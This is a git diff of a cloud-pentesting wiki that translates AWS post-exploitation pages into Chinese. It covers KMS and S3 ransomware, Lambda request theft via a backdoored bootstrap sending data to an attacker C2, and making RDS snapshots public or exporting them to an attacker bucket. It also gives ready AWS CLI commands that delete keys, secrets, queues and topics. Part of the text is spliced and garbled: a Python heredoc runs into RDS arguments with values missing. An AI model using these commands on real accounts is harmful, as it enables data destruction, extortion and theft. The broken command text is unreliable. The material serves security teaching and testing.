-### Generic KMS Ransomware +### 通用 KMS 勒索软件 -#### Global KMS Ransomware +#### 全球 KMS 勒索软件 -There is another way to perform a global KMS Ransomware, which would involve the following steps: +执行全球 KMS 勒索软件还有另一种方法,涉及以下步骤: -- Create a new **key with a key material** imported by the attacker -- **Re-encrypt older data** encrypted with the previous version with the new one. -- **Delete the KMS key** -- Now only the attacker, who has the original key material could be able to decrypt the encrypted data - -### Destroy keys +- 创建一个新的 **密钥,密钥材料由攻击者导入** +- **使用新密钥重新加密** 使用先前版本加密的旧数据。 +- **删除 KMS 密钥** +- 现在只有拥有原始密钥材料的攻击者才能解密加密数据 +### 销毁密钥 ```bash # Destoy they key material previously imported making the key useless aws kms delete-imported-key-material --key-id 1234abcd-12ab-34cd-56ef-1234567890ab # Schedule the destoy of a key (min wait time is 7 days) aws kms schedule-key-deletion \ - --key-id arn:aws:kms:us-west-2:123456789012:key/1234abcd-12ab-34cd-56ef-1234567890ab \ - --pending-window-in-days 7 +--key-id arn:aws:kms:us-west-2:123456789012:key/1234abcd-12ab-34cd-56ef-1234567890ab \ +--pending-window-in-days 7 ``` - > [!CAUTION] -> Note that AWS now **prevents the previous actions from being performed from a cross account:** +> 请注意,AWS 现在**防止从跨账户执行之前的操作:**
{{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/README.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/README.md index 5f25c205a..1e2823a48 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/README.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/README.md @@ -1,33 +1,29 @@ -# AWS - Lambda Post Exploitation +# AWS - Lambda 后期利用 {{#include ../../../../banners/hacktricks-training.md}} ## Lambda -For more information check: +有关更多信息,请查看: {{#ref}} ../../aws-services/aws-lambda-enum.md {{#endref}} -### Steal Others Lambda URL Requests +### 窃取其他 Lambda URL 请求 -If an attacker somehow manage to get RCE inside a Lambda he will be able to steal other users HTTP requests to the lambda. If the requests contain sensitive information (cookies, credentials...) he will be able to steal them. +如果攻击者以某种方式在 Lambda 内部获得 RCE,他将能够窃取其他用户对该 Lambda 的 HTTP 请求。如果请求包含敏感信息(cookies、凭证等),他将能够窃取这些信息。 {{#ref}} aws-warm-lambda-persistence.md {{#endref}} -### Steal Others Lambda URL Requests & Extensions Requests +### 窃取其他 Lambda URL 请求和扩展请求 -Abusing Lambda Layers it's also possible to abuse extensions and persist in the lambda but also steal and modify requests. +滥用 Lambda Layers 也可以滥用扩展并在 Lambda 中持久化,同时窃取和修改请求。 {{#ref}} ../../aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md {{#endref}} {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md index bc93fe53a..427cd8026 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md @@ -6,37 +6,36 @@

https://unit42.paloaltonetworks.com/wp-content/uploads/2019/10/lambda_poc_2_arch.png

-1. **Slicer** is a process outside the container that **send** **invocations** to the **init** process. -2. The init process listens on port **9001** exposing some interesting endpoints: - - **`/2018-06-01/runtime/invocation/next`** – get the next invocation event - - **`/2018-06-01/runtime/invocation/{invoke-id}/response`** – return the handler response for the invoke - - **`/2018-06-01/runtime/invocation/{invoke-id}/error`** – return an execution error -3. **bootstrap.py** has a loop getting invocations from the init process and calls the users code to handle them (**`/next`**). -4. Finally, **bootstrap.py** sends to init the **response** +1. **Slicer** 是一个在容器外部的进程,它 **发送** **调用** 到 **init** 进程。 +2. init 进程监听端口 **9001**,暴露一些有趣的端点: +- **`/2018-06-01/runtime/invocation/next`** – 获取下一个调用事件 +- **`/2018-06-01/runtime/invocation/{invoke-id}/response`** – 返回调用的处理程序响应 +- **`/2018-06-01/runtime/invocation/{invoke-id}/error`** – 返回执行错误 +3. **bootstrap.py** 有一个循环从 init 进程获取调用,并调用用户代码来处理它们 (**`/next`**). +4. 最后,**bootstrap.py** 将 **响应** 发送给 init -Note that bootstrap loads the user code as a module, so any code execution performed by the users code is actually happening in this process. +注意,bootstrap 将用户代码作为模块加载,因此用户代码执行的任何代码实际上都是在这个进程中发生的。 ## Stealing Lambda Requests -The goal of this attack is to make the users code execute a malicious **`bootstrap.py`** process inside the **`bootstrap.py`** process that handle the vulnerable request. This way, the **malicious bootstrap** process will start **talking with the init process** to handle the requests while the **legit** bootstrap is **trapped** running the malicious one, so it won't ask for requests to the init process. +此次攻击的目标是让用户代码在处理易受攻击请求的 **`bootstrap.py`** 进程内部执行一个恶意的 **`bootstrap.py`** 进程。这样,**恶意 bootstrap** 进程将开始 **与 init 进程通信** 以处理请求,而 **合法** 的 bootstrap 被 **困住** 运行恶意进程,因此它不会向 init 进程请求请求。 -This is a simple task to achieve as the code of the user is being executed by the legit **`bootstrap.py`** process. So the attacker could: +这是一个简单的任务,因为用户的代码是由合法的 **`bootstrap.py`** 进程执行的。因此攻击者可以: -- **Send a fake result of the current invocation to the init process**, so init thinks the bootstrap process is waiting for more invocations. - - A request must be sent to **`/${invoke-id}/response`** - - The invoke-id can be obtained from the stack of the legit **`bootstrap.py`** process using the [**inspect**](https://docs.python.org/3/library/inspect.html) python module (as [proposed here](https://github.com/twistlock/lambda-persistency-poc/blob/master/poc/switch_runtime.py)) or just requesting it again to **`/2018-06-01/runtime/invocation/next`** (as [proposed here](https://github.com/Djkusik/serverless_persistency_poc/blob/master/gcp/exploit_files/switcher.py)). -- Execute a malicious **`boostrap.py`** which will handle the next invocations - - For stealthiness purposes it's possible to send the lambda invocations parameters to an attackers controlled C2 and then handle the requests as usual. - - For this attack, it's enough to get the original code of **`bootstrap.py`** from the system or [**github**](https://github.com/aws/aws-lambda-python-runtime-interface-client/blob/main/awslambdaric/bootstrap.py), add the malicious code and run it from the current lambda invocation. +- **向 init 进程发送当前调用的假结果**,使 init 认为 bootstrap 进程在等待更多调用。 +- 必须向 **`/${invoke-id}/response`** 发送请求 +- invoke-id 可以通过使用 [**inspect**](https://docs.python.org/3/library/inspect.html) python 模块从合法的 **`bootstrap.py`** 进程的堆栈中获取(如 [这里所提议](https://github.com/twistlock/lambda-persistency-poc/blob/master/poc/switch_runtime.py))或再次请求 **`/2018-06-01/runtime/invocation/next`**(如 [这里所提议](https://github.com/Djkusik/serverless_persistency_poc/blob/master/gcp/exploit_files/switcher.py))。 +- 执行一个恶意的 **`boostrap.py`**,它将处理下一个调用 +- 为了隐蔽性,可以将 lambda 调用参数发送到攻击者控制的 C2,然后像往常一样处理请求。 +- 对于此攻击,只需从系统或 [**github**](https://github.com/aws/aws-lambda-python-runtime-interface-client/blob/main/awslambdaric/bootstrap.py) 获取原始的 **`bootstrap.py`** 代码,添加恶意代码并从当前 lambda 调用中运行它即可。 ### Attack Steps -1. Find a **RCE** vulnerability. -2. Generate a **malicious** **bootstrap** (e.g. [https://raw.githubusercontent.com/carlospolop/lambda_bootstrap_switcher/main/backdoored_bootstrap.py](https://raw.githubusercontent.com/carlospolop/lambda_bootstrap_switcher/main/backdoored_bootstrap.py)) -3. **Execute** the malicious bootstrap. - -You can easily perform these actions running: +1. 找到一个 **RCE** 漏洞。 +2. 生成一个 **恶意** **bootstrap**(例如 [https://raw.githubusercontent.com/carlospolop/lambda_bootstrap_switcher/main/backdoored_bootstrap.py](https://raw.githubusercontent.com/carlospolop/lambda_bootstrap_switcher/main/backdoored_bootstrap.py)) +3. **执行** 恶意 bootstrap。 +您可以轻松地通过运行以下命令来执行这些操作: ```bash python3 < \ - --db-subnet-group-name \ - --publicly-accessible \ - --vpc-security-group-ids +--db-instance-identifier "new-db-not-malicious" \ +--db-snapshot-identifier \ +--db-subnet-group-name \ +--publicly-accessible \ +--vpc-security-group-ids aws rds modify-db-instance \ - --db-instance-identifier "new-db-not-malicious" \ - --master-user-password 'Llaody2f6.123' \ - --apply-immediately +--db-instance-identifier "new-db-not-malicious" \ +--master-user-password 'Llaody2f6.123' \ +--apply-immediately # Connect to the new DB after a few mins ``` - ### `rds:ModifyDBSnapshotAttribute`, `rds:CreateDBSnapshot` -An attacker with these permissions could **create an snapshot of a DB** and make it **publicly** **available**. Then, he could just create in his own account a DB from that snapshot. - -If the attacker **doesn't have the `rds:CreateDBSnapshot`**, he still could make **other** created snapshots **public**. +拥有这些权限的攻击者可以**创建数据库的快照**并使其**公开可用**。然后,他可以在自己的账户中从该快照创建一个数据库。 +如果攻击者**没有 `rds:CreateDBSnapshot`**,他仍然可以使**其他**创建的快照**公开**。 ```bash # create snapshot aws rds create-db-snapshot --db-instance-identifier --db-snapshot-identifier @@ -54,43 +51,32 @@ aws rds create-db-snapshot --db-instance-identifier --d aws rds modify-db-snapshot-attribute --db-snapshot-identifier --attribute-name restore --values-to-add all ## Specify account IDs instead of "all" to give access only to a specific account: --values-to-add {"111122223333","444455556666"} ``` - ### `rds:DownloadDBLogFilePortion` -An attacker with the `rds:DownloadDBLogFilePortion` permission can **download portions of an RDS instance's log files**. If sensitive data or access credentials are accidentally logged, the attacker could potentially use this information to escalate their privileges or perform unauthorized actions. - +拥有 `rds:DownloadDBLogFilePortion` 权限的攻击者可以 **下载 RDS 实例日志文件的部分内容**。如果敏感数据或访问凭证被意外记录,攻击者可能会利用这些信息来提升他们的权限或执行未经授权的操作。 ```bash aws rds download-db-log-file-portion --db-instance-identifier target-instance --log-file-name error/mysql-error-running.log --starting-token 0 --output text ``` - -**Potential Impact**: Access to sensitive information or unauthorized actions using leaked credentials. +**潜在影响**:访问敏感信息或使用泄露的凭据进行未经授权的操作。 ### `rds:DeleteDBInstance` -An attacker with these permissions can **DoS existing RDS instances**. - +拥有这些权限的攻击者可以**对现有的 RDS 实例进行 DoS 攻击**。 ```bash # Delete aws rds delete-db-instance --db-instance-identifier target-instance --skip-final-snapshot ``` - -**Potential impact**: Deletion of existing RDS instances, and potential loss of data. +**潜在影响**:删除现有的 RDS 实例,并可能导致数据丢失。 ### `rds:StartExportTask` > [!NOTE] -> TODO: Test - -An attacker with this permission can **export an RDS instance snapshot to an S3 bucket**. If the attacker has control over the destination S3 bucket, they can potentially access sensitive data within the exported snapshot. +> TODO: 测试 +拥有此权限的攻击者可以**将 RDS 实例快照导出到 S3 存储桶**。如果攻击者控制了目标 S3 存储桶,他们可能会访问导出快照中的敏感数据。 ```bash aws rds start-export-task --export-task-identifier attacker-export-task --source-arn arn:aws:rds:region:account-id:snapshot:target-snapshot --s3-bucket-name attacker-bucket --iam-role-arn arn:aws:iam::account-id:role/export-role --kms-key-id arn:aws:kms:region:account-id:key/key-id ``` - -**Potential impact**: Access to sensitive data in the exported snapshot. +**潜在影响**:访问导出快照中的敏感数据。 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.md index 16cc52f27..bc8756e3b 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.md @@ -1,42 +1,38 @@ -# AWS - S3 Post Exploitation +# AWS - S3 后期利用 {{#include ../../../banners/hacktricks-training.md}} ## S3 -For more information check: +有关更多信息,请查看: {{#ref}} ../aws-services/aws-s3-athena-and-glacier-enum.md {{#endref}} -### Sensitive Information +### 敏感信息 -Sometimes you will be able to find sensitive information in readable in the buckets. For example, terraform state secrets. +有时您可以在存储桶中找到可读的敏感信息。例如,terraform 状态机密。 -### Pivoting +### 侧向渗透 -Different platforms could be using S3 to store sensitive assets.\ -For example, **airflow** could be storing **DAGs** **code** in there, or **web pages** could be directly served from S3. An attacker with write permissions could **modify the code** from the bucket to **pivot** to other platforms, or **takeover accounts** modifying JS files. +不同的平台可能会使用 S3 存储敏感资产。\ +例如,**airflow** 可能会在其中存储 **DAGs** **代码**,或者 **网页** 可能会直接从 S3 提供服务。具有写入权限的攻击者可以 **修改存储桶中的代码** 以 **侧向渗透** 到其他平台,或 **接管账户** 修改 JS 文件。 -### S3 Ransomware +### S3 勒索软件 -In this scenario, the **attacker creates a KMS (Key Management Service) key in their own AWS account** or another compromised account. They then make this **key accessible to anyone in the world**, allowing any AWS user, role, or account to encrypt objects using this key. However, the objects cannot be decrypted. +在这种情况下,**攻击者在他们自己的 AWS 账户** 或另一个被攻陷的账户中创建一个 KMS(密钥管理服务)密钥。然后,他们使这个 **密钥对全世界的任何人可用**,允许任何 AWS 用户、角色或账户使用此密钥加密对象。然而,这些对象无法被解密。 -The attacker identifies a target **S3 bucket and gains write-level access** to it using various methods. This could be due to poor bucket configuration that exposes it publicly or the attacker gaining access to the AWS environment itself. The attacker typically targets buckets that contain sensitive information such as personally identifiable information (PII), protected health information (PHI), logs, backups, and more. +攻击者识别一个目标 **S3 存储桶并获得写入级别的访问权限**,使用各种方法。这可能是由于糟糕的存储桶配置使其公开可见,或者攻击者获得了 AWS 环境本身的访问权限。攻击者通常针对包含敏感信息的存储桶,例如个人身份信息(PII)、受保护的健康信息(PHI)、日志、备份等。 -To determine if the bucket can be targeted for ransomware, the attacker checks its configuration. This includes verifying if **S3 Object Versioning** is enabled and if **multi-factor authentication delete (MFA delete) is enabled**. If Object Versioning is not enabled, the attacker can proceed. If Object Versioning is enabled but MFA delete is disabled, the attacker can **disable Object Versioning**. If both Object Versioning and MFA delete are enabled, it becomes more difficult for the attacker to ransomware that specific bucket. +为了确定存储桶是否可以被用作勒索软件的目标,攻击者检查其配置。这包括验证是否启用了 **S3 对象版本控制** 和 **多因素身份验证删除(MFA 删除)是否启用**。如果未启用对象版本控制,攻击者可以继续。如果启用了对象版本控制但未启用 MFA 删除,攻击者可以 **禁用对象版本控制**。如果同时启用了对象版本控制和 MFA 删除,攻击者就更难对该特定存储桶进行勒索软件攻击。 -Using the AWS API, the attacker **replaces each object in the bucket with an encrypted copy using their KMS key**. This effectively encrypts the data in the bucket, making it inaccessible without the key. +使用 AWS API,攻击者 **用他们的 KMS 密钥替换存储桶中的每个对象为加密副本**。这有效地加密了存储桶中的数据,使其在没有密钥的情况下无法访问。 -To add further pressure, the attacker schedules the deletion of the KMS key used in the attack. This gives the target a 7-day window to recover their data before the key is deleted and the data becomes permanently lost. +为了施加更大的压力,攻击者安排删除在攻击中使用的 KMS 密钥。这给目标提供了 7 天的时间窗口,以在密钥被删除之前恢复他们的数据,之后数据将永久丢失。 -Finally, the attacker could upload a final file, usually named "ransom-note.txt," which contains instructions for the target on how to retrieve their files. This file is uploaded without encryption, likely to catch the target's attention and make them aware of the ransomware attack. +最后,攻击者可以上传一个最终文件,通常命名为 "ransom-note.txt",其中包含目标如何检索其文件的说明。该文件未加密上传,可能是为了引起目标的注意并让他们意识到勒索软件攻击。 -**For more info** [**check the original research**](https://rhinosecuritylabs.com/aws/s3-ransomware-part-1-attack-vector/)**.** +**有关更多信息** [**请查看原始研究**](https://rhinosecuritylabs.com/aws/s3-ransomware-part-1-attack-vector/)**。** {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.md index e59cbbaaa..c89233c99 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.md @@ -4,50 +4,40 @@ ## Secrets Manager -For more information check: +有关更多信息,请查看: {{#ref}} ../aws-services/aws-secrets-manager-enum.md {{#endref}} -### Read Secrets +### 读取秘密 -The **secrets themself are sensitive information**, [check the privesc page](../aws-privilege-escalation/aws-secrets-manager-privesc.md) to learn how to read them. +**秘密本身是敏感信息**,[查看权限提升页面](../aws-privilege-escalation/aws-secrets-manager-privesc.md)以了解如何读取它们。 -### DoS Change Secret Value +### DoS 更改秘密值 -Changing the value of the secret you could **DoS all the system that depends on that value.** +更改秘密的值可能会**导致所有依赖该值的系统出现 DoS。** > [!WARNING] -> Note that previous values are also stored, so it's easy to just go back to the previous value. - +> 请注意,之前的值也会被存储,因此很容易回到之前的值。 ```bash # Requires permission secretsmanager:PutSecretValue aws secretsmanager put-secret-value \ - --secret-id MyTestSecret \ - --secret-string "{\"user\":\"diegor\",\"password\":\"EXAMPLE-PASSWORD\"}" +--secret-id MyTestSecret \ +--secret-string "{\"user\":\"diegor\",\"password\":\"EXAMPLE-PASSWORD\"}" ``` - -### DoS Change KMS key - +### DoS 更改 KMS 密钥 ```bash aws secretsmanager update-secret \ - --secret-id MyTestSecret \ - --kms-key-id arn:aws:kms:us-west-2:123456789012:key/EXAMPLE1-90ab-cdef-fedc-ba987EXAMPLE +--secret-id MyTestSecret \ +--kms-key-id arn:aws:kms:us-west-2:123456789012:key/EXAMPLE1-90ab-cdef-fedc-ba987EXAMPLE ``` +### DoS 删除秘密 -### DoS Deleting Secret - -The minimum number of days to delete a secret are 7 - +删除秘密的最少天数为 7 ```bash aws secretsmanager delete-secret \ - --secret-id MyTestSecret \ - --recovery-window-in-days 7 +--secret-id MyTestSecret \ +--recovery-window-in-days 7 ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.md index e67a07739..ddbae9a7f 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.md @@ -1,10 +1,10 @@ -# AWS - SES Post Exploitation +# AWS - SES 后期利用 {{#include ../../../banners/hacktricks-training.md}} ## SES -For more information check: +有关更多信息,请查看: {{#ref}} ../aws-services/aws-ses-enum.md @@ -12,76 +12,58 @@ For more information check: ### `ses:SendEmail` -Send an email. - +发送电子邮件。 ```bash aws ses send-email --from sender@example.com --destination file://emails.json --message file://message.json aws sesv2 send-email --from sender@example.com --destination file://emails.json --message file://message.json ``` - -Still to test. +仍需测试。 ### `ses:SendRawEmail` -Send an email. - +发送电子邮件。 ```bash aws ses send-raw-email --raw-message file://message.json ``` - -Still to test. +仍需测试。 ### `ses:SendTemplatedEmail` -Send an email based on a template. - +根据模板发送电子邮件。 ```bash aws ses send-templated-email --source --destination --template ``` - -Still to test. +仍需测试。 ### `ses:SendBulkTemplatedEmail` -Send an email to multiple destinations - +向多个目标发送电子邮件 ```bash aws ses send-bulk-templated-email --source --template ``` - -Still to test. +仍需测试。 ### `ses:SendBulkEmail` -Send an email to multiple destinations. - +向多个目标发送电子邮件。 ``` aws sesv2 send-bulk-email --default-content --bulk-email-entries ``` - ### `ses:SendBounce` -Send a **bounce email** over a received email (indicating that the email couldn't be received). This can only be done **up to 24h after receiving** the email. - +发送一封**退信邮件**,针对收到的邮件(表示该邮件无法被接收)。这只能在**收到邮件后的24小时内**完成。 ```bash aws ses send-bounce --original-message-id --bounce-sender --bounced-recipient-info-list ``` - -Still to test. +仍需测试。 ### `ses:SendCustomVerificationEmail` -This will send a customized verification email. You might need permissions also to created the template email. - +这将发送一封自定义验证电子邮件。您可能还需要权限来创建模板电子邮件。 ```bash aws ses send-custom-verification-email --email-address --template-name aws sesv2 send-custom-verification-email --email-address --template-name ``` - -Still to test. +仍需测试。 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.md index b24660ee1..907f786f3 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.md @@ -4,81 +4,65 @@ ## SNS -For more information: +更多信息: {{#ref}} ../aws-services/aws-sns-enum.md {{#endref}} -### Disrupt Messages +### 干扰消息 -In several cases, SNS topics are used to send messages to platforms that are being monitored (emails, slack messages...). If an attacker prevents sending the messages that alert about it presence in the cloud, he could remain undetected. +在多个情况下,SNS 主题用于向正在监控的平台发送消息(电子邮件、Slack 消息等)。如果攻击者阻止发送关于其在云中存在的警报消息,他可能会保持未被发现。 ### `sns:DeleteTopic` -An attacker could delete an entire SNS topic, causing message loss and impacting applications relying on the topic. - +攻击者可以删除整个 SNS 主题,导致消息丢失并影响依赖该主题的应用程序。 ```bash aws sns delete-topic --topic-arn ``` - -**Potential Impact**: Message loss and service disruption for applications using the deleted topic. +**潜在影响**:使用已删除主题的应用程序可能会导致消息丢失和服务中断。 ### `sns:Publish` -An attacker could send malicious or unwanted messages to the SNS topic, potentially causing data corruption, triggering unintended actions, or exhausting resources. - +攻击者可能会向SNS主题发送恶意或不需要的消息,可能导致数据损坏、触发意外操作或耗尽资源。 ```bash aws sns publish --topic-arn --message ``` - -**Potential Impact**: Data corruption, unintended actions, or resource exhaustion. +**潜在影响**:数据损坏、意外操作或资源耗尽。 ### `sns:SetTopicAttributes` -An attacker could modify the attributes of an SNS topic, potentially affecting its performance, security, or availability. - +攻击者可以修改SNS主题的属性,可能会影响其性能、安全性或可用性。 ```bash aws sns set-topic-attributes --topic-arn --attribute-name --attribute-value ``` - -**Potential Impact**: Misconfigurations leading to degraded performance, security issues, or reduced availability. +**潜在影响**:错误配置导致性能下降、安全问题或可用性降低。 ### `sns:Subscribe` , `sns:Unsubscribe` -An attacker could subscribe or unsubscribe to an SNS topic, potentially gaining unauthorized access to messages or disrupting the normal functioning of applications relying on the topic. - +攻击者可以订阅或取消订阅SNS主题,可能会获得对消息的未经授权访问或干扰依赖该主题的应用程序的正常功能。 ```bash aws sns subscribe --topic-arn --protocol --endpoint aws sns unsubscribe --subscription-arn ``` - -**Potential Impact**: Unauthorized access to messages, service disruption for applications relying on the affected topic. +**潜在影响**:未经授权访问消息,依赖受影响主题的应用程序服务中断。 ### `sns:AddPermission` , `sns:RemovePermission` -An attacker could grant unauthorized users or services access to an SNS topic, or revoke permissions for legitimate users, causing disruptions in the normal functioning of applications that rely on the topic. - +攻击者可以授予未经授权的用户或服务访问SNS主题的权限,或撤销合法用户的权限,从而导致依赖该主题的应用程序正常运行受到干扰。 ```css aws sns add-permission --topic-arn --label --aws-account-id --action-name aws sns remove-permission --topic-arn --label ``` - -**Potential Impact**: Unauthorized access to the topic, message exposure, or topic manipulation by unauthorized users or services, disruption of normal functioning for applications relying on the topic. +**潜在影响**:未经授权访问主题、消息暴露或未经授权用户或服务对主题的操控,干扰依赖于该主题的应用程序的正常功能。 ### `sns:TagResource` , `sns:UntagResource` -An attacker could add, modify, or remove tags from SNS resources, disrupting your organization's cost allocation, resource tracking, and access control policies based on tags. - +攻击者可以添加、修改或删除SNS资源的标签,干扰您组织基于标签的成本分配、资源跟踪和访问控制策略。 ```bash aws sns tag-resource --resource-arn --tags Key=,Value= aws sns untag-resource --resource-arn --tag-keys ``` - -**Potential Impact**: Disruption of cost allocation, resource tracking, and tag-based access control policies. +**潜在影响**:成本分配、资源跟踪和基于标签的访问控制策略的中断。 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.md index 872693e89..f0ff235b8 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.md @@ -1,10 +1,10 @@ -# AWS - SQS Post Exploitation +# AWS - SQS 后期利用 {{#include ../../../banners/hacktricks-training.md}} ## SQS -For more information check: +有关更多信息,请查看: {{#ref}} ../aws-services/aws-sqs-and-sns-enum.md @@ -12,80 +12,62 @@ For more information check: ### `sqs:SendMessage` , `sqs:SendMessageBatch` -An attacker could send malicious or unwanted messages to the SQS queue, potentially causing data corruption, triggering unintended actions, or exhausting resources. - +攻击者可以向 SQS 队列发送恶意或不需要的消息,可能导致数据损坏、触发意外操作或耗尽资源。 ```bash aws sqs send-message --queue-url --message-body aws sqs send-message-batch --queue-url --entries ``` - -**Potential Impact**: Vulnerability exploitation, Data corruption, unintended actions, or resource exhaustion. +**潜在影响**:漏洞利用,数据损坏,意外操作或资源耗尽。 ### `sqs:ReceiveMessage`, `sqs:DeleteMessage`, `sqs:ChangeMessageVisibility` -An attacker could receive, delete, or modify the visibility of messages in an SQS queue, causing message loss, data corruption, or service disruption for applications relying on those messages. - +攻击者可以接收、删除或修改SQS队列中消息的可见性,从而导致消息丢失、数据损坏或依赖这些消息的应用程序服务中断。 ```bash aws sqs receive-message --queue-url aws sqs delete-message --queue-url --receipt-handle aws sqs change-message-visibility --queue-url --receipt-handle --visibility-timeout ``` - -**Potential Impact**: Steal sensitive information, Message loss, data corruption, and service disruption for applications relying on the affected messages. +**潜在影响**:窃取敏感信息、消息丢失、数据损坏,以及依赖受影响消息的应用程序服务中断。 ### `sqs:DeleteQueue` -An attacker could delete an entire SQS queue, causing message loss and impacting applications relying on the queue. - +攻击者可以删除整个 SQS 队列,导致消息丢失并影响依赖该队列的应用程序。 ```arduino Copy codeaws sqs delete-queue --queue-url ``` - -**Potential Impact**: Message loss and service disruption for applications using the deleted queue. +**潜在影响**:使用已删除队列的应用程序可能会出现消息丢失和服务中断。 ### `sqs:PurgeQueue` -An attacker could purge all messages from an SQS queue, leading to message loss and potential disruption of applications relying on those messages. - +攻击者可以清除 SQS 队列中的所有消息,从而导致消息丢失和依赖这些消息的应用程序可能出现中断。 ```arduino Copy codeaws sqs purge-queue --queue-url ``` - -**Potential Impact**: Message loss and service disruption for applications relying on the purged messages. +**潜在影响**:依赖于被清除消息的应用程序可能会出现消息丢失和服务中断。 ### `sqs:SetQueueAttributes` -An attacker could modify the attributes of an SQS queue, potentially affecting its performance, security, or availability. - +攻击者可以修改SQS队列的属性,可能会影响其性能、安全性或可用性。 ```arduino aws sqs set-queue-attributes --queue-url --attributes ``` - -**Potential Impact**: Misconfigurations leading to degraded performance, security issues, or reduced availability. +**潜在影响**:错误配置导致性能下降、安全问题或可用性降低。 ### `sqs:TagQueue` , `sqs:UntagQueue` -An attacker could add, modify, or remove tags from SQS resources, disrupting your organization's cost allocation, resource tracking, and access control policies based on tags. - +攻击者可以添加、修改或删除SQS资源的标签,从而干扰您组织基于标签的成本分配、资源跟踪和访问控制策略。 ```bash aws sqs tag-queue --queue-url --tags Key=,Value= aws sqs untag-queue --queue-url --tag-keys ``` - -**Potential Impact**: Disruption of cost allocation, resource tracking, and tag-based access control policies. +**潜在影响**:成本分配、资源跟踪和基于标签的访问控制策略的中断。 ### `sqs:RemovePermission` -An attacker could revoke permissions for legitimate users or services by removing policies associated with the SQS queue. This could lead to disruptions in the normal functioning of applications that rely on the queue. - +攻击者可以通过删除与 SQS 队列相关的策略来撤销合法用户或服务的权限。这可能导致依赖该队列的应用程序正常运行的中断。 ```arduino arduinoCopy codeaws sqs remove-permission --queue-url --label ``` - -**Potential Impact**: Disruption of normal functioning for applications relying on the queue due to unauthorized removal of permissions. +**潜在影响**:由于未经授权的权限移除,依赖于队列的应用程序的正常功能受到干扰。 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.md index 0d636f261..bbf4c932a 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.md @@ -1,10 +1,10 @@ -# AWS - SSO & identitystore Post Exploitation +# AWS - SSO & identitystore 后期利用 {{#include ../../../banners/hacktricks-training.md}} ## SSO & identitystore -For more information check: +有关更多信息,请查看: {{#ref}} ../aws-services/aws-iam-enum.md @@ -12,8 +12,7 @@ For more information check: ### `sso:DeletePermissionSet` | `sso:PutPermissionsBoundaryToPermissionSet` | `sso:DeleteAccountAssignment` -These permissions can be used to disrupt permissions: - +这些权限可用于干扰权限: ```bash aws sso-admin delete-permission-set --instance-arn --permission-set-arn @@ -21,9 +20,4 @@ aws sso-admin put-permissions-boundary-to-permission-set --instance-arn --target-id --target-type --permission-set-arn --principal-type --principal-id ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md index 6a0cd5ba9..1725cdbd1 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md @@ -1,10 +1,10 @@ -# AWS - Step Functions Post Exploitation +# AWS - Step Functions 后期利用 {{#include ../../../banners/hacktricks-training.md}} ## Step Functions -For more information about this AWS service, check: +有关此 AWS 服务的更多信息,请查看: {{#ref}} ../aws-services/aws-stepfunctions-enum.md @@ 